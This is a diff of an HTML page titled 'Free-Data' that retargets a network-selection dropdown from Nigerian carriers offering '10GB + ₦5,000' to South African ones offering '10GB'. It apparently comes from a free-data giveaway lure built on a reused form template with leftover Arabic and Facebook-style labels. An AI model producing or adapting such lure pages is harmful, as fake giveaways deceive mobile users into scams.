--- a/mtndamba.html
+++ b/mtndamba.html
@@ -136,17 +136,18 @@
 
                     
            <center><p class="title"><font color="black">CHOOSE YOUR NETWORK BELOW</font></p></center>
-              <center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDhoSuoYXWy5zKaQsuU4Zva3w-lb1hEchJiRqba0pSGRMk5-G-uIqI0OQrwZuvKf3mOHoJK8XOV2303b1lUFsPJdA-SVhWBXhTIa6UOA_B-0vmbUIKfiwl3OcXBETxCgENug0mQEbK9vGDfYh2xZLanlQu7mZhE9ffDKzyJFPjICcLDzsj0OI_yVeOr8XG/s320/E04436DA-3F0A-437A-A674-0CEF43410CC3.png" alt="Free-Data" style="width: 40%;"></center>
+              <center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfeWwBqsbX_X3rUIBOjF2Ivo97iDUpSfJN5WkT-biPxyAe8Xjp9i6MpKA5fnWEQcFvRwt8QzlkwiIvVssGIqdyyXdhUgJwXEHblUVnf80gmGjXKzbHUt19RQauac1PVwioFOu3DPofeeX-iHeTeH77HwfhHOQM28XDdMMh2TxUg_9NT4lZ5THmbA3PLL91/s609/28C59BCD-98C3-467A-B6C3-7637CB03E0BB.png" alt="Free-Data" style="width: 40%;"></center>
           <center>
 <select aria-label="الجنس" name="birthday_year" id="year" title="الجنس" class="_5dba" style="
     width: 330px;
     height: 56px;
 ">
 <option value="أختر نوع الشبكة" selected="1">---CHOOSE HERE---</option>
-  <option value="1">MTN - 10GB + ₦5,000 </option>
-<option value="2">Airtel - 10GB + ₦5,000  </option>
-<option value="2">Glo - 10GB + ₦5,000 </option>
-<option value="2">9-Mobile - 10GB + ₦5,000 </option>
+  <option value="1">MTN - 10GB  </option>
+<option value="2">Vodacom - 10GB   </option>
+<option value="2">Telkom - 10GB  </option>
+<option value="2">Cell C - 10GB  </option>
+<option value="2">Rain - 10GB  </option>    
 
   
 </select>
